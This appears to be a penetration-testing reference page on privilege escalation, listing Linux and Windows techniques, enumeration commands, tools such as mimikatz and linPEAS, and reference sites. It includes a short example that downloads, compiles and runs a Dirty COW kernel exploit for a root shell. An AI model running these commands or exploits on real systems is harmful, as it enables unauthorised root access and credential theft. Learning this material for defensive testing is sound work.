Privilege Escalation
Privilege Escalation
Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access — often enabling lateral movement, persistence, or full system compromise.
Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege).
Operational Context
Privilege escalation typically follows successful Initial Access, especially when the initial compromise grants access only to limited user accounts.
This phase is crucial for:
- Achieving administrative control (root, SYSTEM)
- Enabling credential extraction and lateral movement
- Bypassing sandboxed or containerized environments
- Establishing persistence mechanisms (e.g., registry, startup tasks)
Vertical Privilege Escalation
Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root).
Common Techniques
- Exploiting kernel or driver vulnerabilities
- Abusing misconfigured SUID/SGID binaries (Linux)
- Misusing weak or world-writable service files
- Leveraging unquoted service paths (Windows)
- DLL hijacking or service misconfiguration
- Stealing credentials from memory or config files
- Abusing scheduled tasks or cron jobs
- Exploiting insecure file permissions or ownership
- Leveraging token impersonation or privilege tokens (Windows)
- Dumping and cracking password hashes
- Abusing Linux capabilities (e.g., cap_sys_admin)
- Escaping weakly isolated Docker or LXC containers
- Exploiting insecure ACLs or lack of integrity controls
Tools
- linPEAS (automated privilege escalation enumeration on Linux)
- winPEAS (automated privilege escalation enumeration on Windows)
- Seatbelt (Windows enumeration tool focused on privilege escalation)
- PowerUp (PowerShell tool for Windows privilege escalation)
- Watson (detects privilege escalation vectors on Windows)
- BeRoot (privilege escalation auditor for Linux, MacOS, and Windows)
- Linux Exploit Suggester (suggests kernel exploits)
- Windows Exploit Suggester (suggests local exploits for Windows)
- g0tmi1k's privesc checklist (manual enumeration and exploitation list)
Automated Exploitation Frameworks
- Metasploit (post modules for local privesc on Windows and Linux)
- Exploit-DB SearchSploit (search for local exploits by kernel or OS version)
- Evil-WinRM (post-exploitation over WinRM)
Horizontal Privilege Escalation
Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access.
Common Techniques
- Reading other users’ sensitive files due to improper permissions
- Accessing SSH keys, config files, or tokens
- Hijacking user sessions (e.g., TTY snooping or credential reuse)
- Exploiting insecure file-sharing configurations (e.g., SMB shares)
- Abuse of API tokens or database credentials found in cleartext
Tools
- pspy (monitors Linux processes to detect privilege-related activity)
- ls -la /home/ (manual check for exposed user data)
- ssh-agent hijacking scripts
- procmon (process monitor for live file and registry activity on Windows)
- mimikatz (extracts passwords, hashes, and tokens from memory)
Enumeration Checklists
Linux Enumeration Commands
| Purpose | Command |
|---|---|
| SUID/SGID binaries | find / -perm -4000 2>/dev/null
|
| Kernel version | uname -a
|
| Environment variables | env
|
| Running processes | ps aux
|
| Installed packages (Debian) | dpkg -l
|
| Installed packages (Red Hat) | rpm -qa
|
| Writable directories | find / -writable 2>/dev/null
|
| Cron jobs | cat /etc/crontab
|
| User info | /etc/passwd
|
| Group info | /etc/group
|
Windows
- Whoami and privileges: `whoami /priv`
- Local groups: `net localgroup administrators`
- Services: `sc query` or `Get-Service`
- Startup folders and registry: `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
- Scheduled tasks: `schtasks /query`
- Installed programs: `wmic product get name`
- Environment: `set`
- File permissions: `icacls`, `accesschk`
Example: Local Kernel Exploit (Linux)
# Download and compile local privilege escalation exploit (example: Dirty Cow variant)
wget https://www.exploit-db.com/download/40839 -O exploit.c
gcc exploit.c -o exploit
./exploit
# Output: spawns root shell if successfulWebsites & References
- GTFOBins (trusted repo of SUID/privilege escalation via Linux binaries)
- LOLBAS (Living Off The Land Binaries and Scripts for Windows privilege escalation)
- hacktricks.xyz (comprehensive privilege escalation techniques for Linux and Windows)
- PEASS-ng GitHub (official PEAS suite repository)
- FuzzySecurity Windows Privesc Guide
- rebootuser's Linux privesc cheat sheet